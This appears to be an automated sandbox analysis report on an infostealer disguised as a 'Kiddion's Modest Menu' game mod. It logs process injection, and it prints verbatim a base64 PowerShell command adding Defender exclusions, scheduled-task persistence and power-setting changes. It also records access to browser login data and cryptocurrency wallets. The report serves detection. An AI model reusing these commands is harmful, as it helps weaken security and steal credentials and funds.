                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A2D8E2
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2DC92 SetUnhandledExceptionFilter,0_2_00A2DC92
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A2DC9E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A35DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A35DCE
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A2D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A2D8E2
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A2DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A2DC9E
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A35DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00A35DCE
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A561B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00A561B4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#BAmwSli0s#> Add-MpPreference <#VCji#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#R8Z9#> -Force <#WMu0tDA#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#BAmwSli0s#> Add-MpPreference <#VCji#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#R8Z9#> -Force <#WMu0tDA#>Jump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeMemory written: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiaqqbtahcauwbsagkamabzacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmavgbdagoaaqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbsadgawga5acmapgagac0argbvahiaywblacaapaajafcatqb1adaadabeaeeaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiaqqbtahcauwbsagkamabzacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmavgbdagoaaqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbsadgawga5acmapgagac0argbvahiaywblacaapaajafcatqb1adaadabeaeeaiwa+aa=="
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiaqqbtahcauwbsagkamabzacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmavgbdagoaaqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbsadgawga5acmapgagac0argbvahiaywblacaapaajafcatqb1adaadabeaeeaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiaqqbtahcauwbsagkamabzacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmavgbdagoaaqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbsadgawga5acmapgagac0argbvahiaywblacaapaajafcatqb1adaadabeaeeaiwa+aa==" Jump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,0_2_00A3B007
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A3F048
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,0_2_00A3F299
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A3F334
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,0_2_00A3F587
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,0_2_00A3F5E6
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,0_2_00A3F6BB
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A3F7AD
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,0_2_00A3F706
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,0_2_00A3F8B3
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,0_2_00A3AB0C
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,2_2_00A3F8B3
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,2_2_00A3B007
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00A3F048
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,2_2_00A3F299
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00A3F334
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,2_2_00A3AB0C
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,2_2_00A3F587
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,2_2_00A3F5E6
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: EnumSystemLocalesW,2_2_00A3F6BB
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00A3F7AD
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: GetLocaleInfoW,2_2_00A3F706
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00A2E6D7
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394244557.0000000001607000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363634962.0000000001604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ender\MsMpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394244557.0000000001607000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363634962.0000000001604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1310526188.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363634962.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1306793258.0000000001604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Kiddion's Modest Menu v.1.0.0.exe PID: 7696, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2391926634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2393850949.00000000015AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2393850949.00000000015AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2393850949.00000000015AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2393850949.00000000015AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274785230.0000000001599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
